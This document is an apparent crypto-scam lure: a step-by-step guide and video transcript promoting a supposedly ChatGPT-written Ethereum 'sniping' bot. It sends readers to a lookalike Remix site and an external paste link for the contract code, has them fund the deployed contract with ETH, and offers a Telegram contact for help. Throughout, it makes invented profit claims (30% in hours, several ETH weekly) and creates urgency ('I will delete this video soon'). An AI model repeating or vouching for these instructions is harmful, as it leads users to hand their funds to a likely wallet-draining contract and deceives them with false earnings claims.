STEP-BY-STEP GUIDE: 🔹1.
Install & Configure MetaMask
https://metamask.io/download/ 🔸
2. Open Remix: 📲 https://remixplatform.icu (The bot is best compatible with this
version of remix) 🔹
3. Create a “New File”. Name it as you prefer, for example: “bot.sol”. Ensure it ends
with .sol, which is the extension for the Ethereum programming language. ➡️
4. 𝗣𝗮𝘀𝘁𝗲 𝗧𝗛𝗜𝗦 𝗰𝗼𝗱𝗲 𝗶𝗻𝘁𝗼 𝗥𝗲𝗺𝗶𝘅 compiler:
https://paste.ubuntu.com/p/ZZtXrNBQrT/ 🔹
5. Go to the "Compile" tab in Remix and compile using Solidity version 0.6.6 🔸
6. Go to the “DEPLOY & RUN TRANSACTIONS” tab, select “Injected Web3” as the
environment, and connect your wallet. Then click “Deploy”. Approve the contract
creation fee to create your own contract. Note: If the fees are too high, use Arbitrum
network for deploy and funding the contract. 🔹
7. Fund your bot to enable frontrunning transactions. Just below the
Deployed/Unpinned Contracts inscription your contract address will be indicated
(UNISWAPSLIPPAGE... AT 0X...address) There is a copy button to the right. Copy it
and send more than 0.2-0.5 ETH directly from your wallet (to prevent negating
slippage). 🔸
8. Once your transaction is confirmed, press the "start" button to activate the bot.
You can withdraw money anytime by clicking the "withdrawal" button. 💰Feel free to
write me in Telegram https://t.me/solidity_web3dev to get assistance installing the
bot🍀
0:03
hello everyone my name is Jacob and I'm
0:05
a web 3 developer I recorded this video
0:08
for my private Channel but I have
0:10
decided to share it with you all for
0:11
free in order to gain your support and
0:14
attention for my new channel here I will
0:16
show you how to create and operate an
0:18
ethereum sniping bot using AI powered
0:20
chat GPT and guess what it already
0:23
brings me and my students passive income
0:25
every day which is amazing this sniping
0:28
bot monitors the blockchain for new to
0:30
tokens and significant price changes
0:32
when it finds an opportunity it acts
0:34
like a ninja buying or selling tokens
0:35
quickly before other Traders realize
0:37
what's happening this gives us an
0:39
advantage in making money on price
0:41
differences the secret of the bot's
0:43
success is its ability to detect tokens
0:45
immediately after they are listed or
0:47
when there is a sudden price change it
0:49
uses sophisticated algorithms to
0:51
identify these movements and make trades
0:53
for you you just need to sit back and
0:55
let the profits roll in if you think
0:57
this sounds too complicated don't worry
1:00
it's actually pretty simple and doesn't
1:02
require any coding knowledge enjoy your
1:04
viewing all right let's start I asked
1:06
chat GPT to write me a code for a smart
1:09
contract on ethereum to automatically
1:10
hunt for sniping opportunities to earn
1:14
ethereum there we go chat GPT is running
1:17
the code and I bet it's better than any
1:19
human could possibly think
1:23
of then head over to remix remix is a
1:26
web 3 application that allows us to
1:28
develop compile deploy and launch Smart
1:30
contracts coded in the solidity language
1:33
I'll put a link to remix in the
1:35
description below make sure you have the
1:37
metamask browser extension installed and
1:39
you're connected to the ethereum main
1:41
net if it's your first time on remix it
1:43
may ask you to agree to their terms I've
1:45
already done it head over to the sidebar
1:47
on the left and create a new
1:50
contract we're going to name it bot
1:53
doou next copy this code from chat GPT
1:57
and paste it into the bot file you've
1:59
just created this is our sniping trading
2:01
bot I will also place this code under
2:04
the description so that you can copy it
2:06
a couple of things to look at after
2:07
pasting the code are lines 13 and 14 you
2:11
can follow these addresses using ether
2:13
scan these are the addresses of wrapped
2:15
ether tokens which we'll be competing
2:17
against you don't actually need to have
2:19
any wrapped
2:20
ether perfect it's the official wrapped
2:23
ether address always a good idea to
2:26
check that back to remix now that our
2:29
bot file is ready let's compile it as
2:31
you can see it's built with the
2:33
0.6.3 version of
2:35
solidity to avoid errors use the same
2:41
version click here also make sure that
2:44
the language is set to solidity enable
2:47
optimization now click on the compile
2:49
bot button and wait for the bot to
2:51
compile now we're going to deploy this
2:53
to our wallet head over to the deploy
2:55
and run transactions tab in remix here
2:58
we need to select injected provider as
3:00
the environment we need to confirm the
3:02
contract on the blockchain by paying gas
3:05
fees gas fees are the commission for the
3:07
ethereum network for smart contract
3:10
deployment now the deployment under
3:12
utility is ready to go click
3:15
deploy I always set the gas fee to high
3:18
there's usually not much of a difference
3:20
and it puts the transaction through much
3:27
faster now we wait for the transaction
3:29
to confirm
3:34
sweet we can see here that it is
3:36
confirmed meaning our smart contract is
3:38
deployed now you can see the various
3:40
functions for our smart contract the
3:43
start button enables the bot to start
3:44
monitoring the markets the withdraw
3:46
button stops the bot and transfers funds
3:48
back to the wallet you can also see the
3:50
current balance of the
3:52
bot when the smart contract is deployed
3:55
copy the address and check it on ether
3:57
scan
4:03
as we can see my wallet is the creator
4:06
of this
4:09
contract
4:11
excellent fund it with some ethereum
4:14
which will be used for
4:16
trading make sure you get the right
4:18
address
4:19
here you can fund the contract with
4:21
whatever amount of ethereum you want but
4:24
keep in mind that the more you put in
4:26
the larger the trades you'll be able to
4:27
make and potentially more profit you can
4:29
can accumulate over
4:44
time sweet there we go the transaction
4:47
confirms that the funds were sent to the
4:49
contract we can make sure by checking
4:51
our contract address on ether scan once
4:53
again ensuring our ethereum is in the
4:55
contract nice it's got two ethereum
4:58
which is the amount we the contract with
5:00
the last step is to click the start
5:02
button this will enable the bot to start
5:04
sniffing the me poool to find different
5:06
liquidity pairs in order for you to
5:08
sandwich
5:09
transactions let's set the gas speed to
5:12
high save and click
5:14
confirm we are waiting for
5:17
confirmation
5:19
excellent let's go to Ether scan and
5:21
make sure the bot has started
5:24
working I will now stop the recording
5:26
and in a few hours we will see what
5:28
result our bot will
5:34
produce okay I'm here and it's been
5:37
about 3 hours let's see what we
5:40
got so as you can see I have about 2.6
5:44
ethereum which is 30% profit already
5:47
here we can see several bot transactions
5:49
which in total has brought us 0.6
5:51
ethereum let's go to remix and as we can
5:54
see the bot's balance is the
5:57
same I'll let the bot run for a while
6:00
longer and come back to check the
6:05
results all right let's refresh the page
6:08
and see what we
6:10
got nice it's a little over 2.8 ethereum
6:14
so it basically took me a day to gain
6:16
over half of my deposit back that's
6:18
pretty
6:20
impressive the bot will continue to run
6:22
until we click the withdrawal
6:25
button now let's go back to the remix
6:28
make sure that the bot balance matches
6:30
the contract balance and click the
6:32
withdrawal
6:35
button click
6:38
confirm as we can see the button
6:41
withdraw money initiated a transaction
6:43
that will withdraw the entire amount
6:45
from the Bots balance to my wallet click
6:47
confirm and wait for the transaction to
6:52
complete
6:54
sweet we can also see that the bot's
6:56
balance is fully withdrawn let's go to
6:59
our metamask and see what we have now
7:02
you can see the balance from the bot is
7:04
already now in my wallet this is only
7:06
after running the bot for a little over
7:08
a day perfect I've even had weeks where
7:10
I've made 3 to six ethereum sometimes
7:13
even more a lot depends on the load on
7:15
ethereum network I will delete this
7:17
video soon as it is a private Channel
7:19
video I posted to attract a new audience
7:21
drop the like and don't forget to
subscribe